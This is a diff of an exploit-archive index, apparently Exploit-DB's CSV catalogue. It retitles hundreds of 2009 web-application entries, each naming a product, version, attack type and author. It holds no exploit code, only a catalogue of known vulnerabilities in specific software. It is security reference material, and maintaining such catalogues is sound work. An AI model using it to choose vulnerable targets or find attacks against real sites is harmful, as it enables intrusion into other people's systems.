 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0
-7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
+7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Parameter Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
 7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0
-7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
+7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,php,webapps,0
 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
-7687,platforms/php/webapps/7687.txt,"playSms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
-7689,platforms/php/webapps/7689.txt,"BlogHelper - 'common_db.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
-7690,platforms/php/webapps/7690.txt,"PollHelper - 'poll.inc' Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
+7687,platforms/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Remote / Local File Inclusion",2009-01-06,ahmadbady,php,webapps,0
+7689,platforms/php/webapps/7689.txt,"BlogHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
+7690,platforms/php/webapps/7690.txt,"PollHelper - Remote Config File Disclosure",2009-01-06,ahmadbady,php,webapps,0
 7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
@@ -20447,17 +20450,17 @@ id,file,description,date,author,platform,type,port
 7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
 7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
-7711,platforms/php/webapps/7711.txt,"Fast FAQs System - (Authentication Bypass) SQL Injection",2009-01-09,x0r,php,webapps,0
+7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
 7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
-7719,platforms/php/webapps/7719.txt,"Fast Guest Book - (Authentication Bypass) SQL Injection",2009-01-11,Moudi,php,webapps,0
+7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
 7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
 7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
-7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - (Authentication Bypass) SQL Injection",2009-01-11,SirGod,php,webapps,0
-7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - (Authentication Bypass) SQL Injection",2009-01-11,x0r,php,webapps,0
+7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
+7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
 7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
 7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
@@ -20475,8 +20478,8 @@ id,file,description,date,author,platform,type,port
 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
 7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
-7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0
-7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0
+7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,php,webapps,0
+7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,php,webapps,0
 7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps,0
 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0
 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0
@@ -20506,13 +20509,13 @@ id,file,description,date,author,platform,type,port 7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0 7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0 7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0 -7800,platforms/asp/webapps/7800.txt,"eFAQ - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 -7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0 +7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 +7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 +7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 +7803,platforms/asp/webapps/7803.txt,"Ping IP - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0 7805,platforms/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0 7806,platforms/php/webapps/7806.txt,"blogit! 
- SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0 -7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0 +7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - Authentication Bypass",2009-01-16,SuB-ZeRo,asp,webapps,0 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0 @@ -20520,7 +20523,7 @@ id,file,description,date,author,platform,type,port 7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0 7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0 7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0 -7817,platforms/php/webapps/7817.txt,"Click&Email - (Authentication Bypass) SQL Injection",2009-01-18,SuB-ZeRo,php,webapps,0 +7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0 7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 
@@ -20547,7 +20550,7 @@ id,file,description,date,author,platform,type,port
 7851,platforms/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,php,webapps,0
 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,php,webapps,0
 7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0
-7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0
+7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,asp,webapps,0
 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0
 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0
 7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0
@@ -20560,7 +20563,7 @@ id,file,description,date,author,platform,type,port
 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0
 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0
 7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0
-7880,platforms/php/webapps/7880.txt,"ClickAuction - (Authentication Bypass) SQL Injection",2009-01-26,R3d-D3V!L,php,webapps,0
+7880,platforms/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,php,webapps,0
 7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
 7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
 7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
@@ -20580,10 +20583,10 @@ id,file,description,date,author,platform,type,port
 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0
 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",php,webapps,0
 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
-7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
+7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",php,webapps,0
 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
 7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
-7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
+7924,platforms/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,asp,webapps,0
 7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
@@ -20593,8 +20596,8 @@ id,file,description,date,author,platform,type,port
 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
-7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
-7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
+7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
+7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - Authentication Bypass",2009-02-02,ByALBAYX,php,webapps,0
 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0
 7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps,0
 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0
@@ -20604,14 +20607,14 @@ id,file,description,date,author,platform,type,port 18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 -7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 +7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - Authentication Bypass",2009-02-03,R3d-D3V!L,php,webapps,0 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 -7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 +7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - Authentication Bypass",2009-02-03,x0r,php,webapps,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forum (SMF) - 'BBCode' Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0 7961,platforms/php/webapps/7961.php,"WEBalbum 2.4b - (photo.php id) Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 -7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - (Authentication Bypass) SQL Injection",2009-02-03,Kacak,asp,webapps,0 +7963,platforms/asp/webapps/7963.txt,"MyDesing Sayac 2.0 - Authentication Bypass",2009-02-03,Kacak,asp,webapps,0 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0 
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0 @@ -20660,9 +20663,9 @@ id,file,description,date,author,platform,type,port 8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0 8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0 8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0 -8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 -8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 -8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - (Authentication Bypass) SQL Injection",2009-02-10,x0r,php,webapps,0 +8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 +8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0 +8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0 
@@ -20688,7 +20691,7 @@ id,file,description,date,author,platform,type,port
 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
 8066,platforms/php/webapps/8066.txt,"YACS CMS 8.11 - update_trailer.php Remote File Inclusion",2009-02-16,ahmadbady,php,webapps,0
 8068,platforms/php/webapps/8068.txt,"ravennuke 2.3.0 - Multiple Vulnerabilities",2009-02-16,waraxe,php,webapps,0
-8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (via Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
+8069,platforms/php/webapps/8069.txt,"Grestul 1.x - Authentication Bypass (Cookie SQL Injection)",2009-02-16,x0r,php,webapps,0
 8070,platforms/asp/webapps/8070.txt,"SAS Hotel Management System - Arbitrary File Upload",2009-02-17,ZoRLu,asp,webapps,0
 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0
 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'header.php mod' SQL Injection",2009-02-17,x0r,php,webapps,0
@@ -20707,10 +20710,10 @@ id,file,description,date,author,platform,type,port
 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
 8098,platforms/php/webapps/8098.txt,"taifajobs 1.0 - (jobid) SQL Injection",2009-02-23,K-159,php,webapps,0
 8100,platforms/php/webapps/8100.pl,"MDPro Module My_eGallery - 'pid' SQL Injection",2009-02-23,StAkeR,php,webapps,0
-8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - (Authentication Bypass) SQL Injection",2009-02-24,Fireshot,php,webapps,0
+8101,platforms/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,php,webapps,0
 8104,platforms/php/webapps/8104.txt,"Qwerty CMS - 'id' SQL Injection",2009-02-24,b3,php,webapps,0
 8105,platforms/php/webapps/8105.txt,"pPIM 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0
-8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0
+8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - Authentication Bypass",2009-02-25,ByALBAYX,asp,webapps,0
 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0
@@ -20718,7 +20721,7 @@ id,file,description,date,author,platform,type,port
 8113,platforms/asp/webapps/8113.txt,"DesignerfreeSolutions NewsLetter Manager Pro - Authentication Bypass",2009-02-26,ByALBAYX,asp,webapps,0
 8114,platforms/php/webapps/8114.txt,"Coppermine Photo Gallery 1.4.20 - (BBCode IMG) Privilege Escalation",2009-02-26,StAkeR,php,webapps,0
 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
-8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0
+8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - Authentication Bypass",2009-02-26,rootzig,php,webapps,0
 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
 8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
@@ -20793,7 +20796,7 @@ id,file,description,date,author,platform,type,port
 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0
 8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0
 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0
-8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
+8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - Authentication Bypass",2009-03-27,Qabandi,php,webapps,0
 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
@@ -20838,10 +20841,10 @@ id,file,description,date,author,platform,type,port
 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0
 8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,asp,webapps,0
 8379,platforms/asp/webapps/8379.txt,"Back-End CMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0
-8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
-8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0
+8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
+8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,php,webapps,0
 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
-8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0
+8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0
 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0
 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0
@@ -20853,7 +20856,7 @@ id,file,description,date,author,platform,type,port
 8399,platforms/php/webapps/8399.pl,"Flatnuke 2.7.1 - (level) Privilege Escalation",2009-04-13,StAkeR,php,webapps,0
 8408,platforms/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,php,webapps,0
 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,php,webapps,0
-8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - (Authentication Bypass) SQL Injection",2009-04-13,Dr-HTmL,php,webapps,0
+8414,platforms/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,php,webapps,0
 8415,platforms/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,php,webapps,0
 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0
 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0
@@ -20874,7 +20877,7 @@ id,file,description,date,author,platform,type,port
 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 - (adtype) Local File Inclusion",2009-04-15,ZoRLu,php,webapps,0
 8446,platforms/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - (lang_file) Local File Inclusion",2009-04-15,ahmadbady,php,webapps,0
 8448,platforms/php/webapps/8448.php,"Geeklog 1.5.2 - savepreferences()/*blocks[] SQL Injection",2009-04-16,Nine:Situations:Group,php,webapps,0
-8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Authentication Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0
+8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,php,webapps,0
 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0
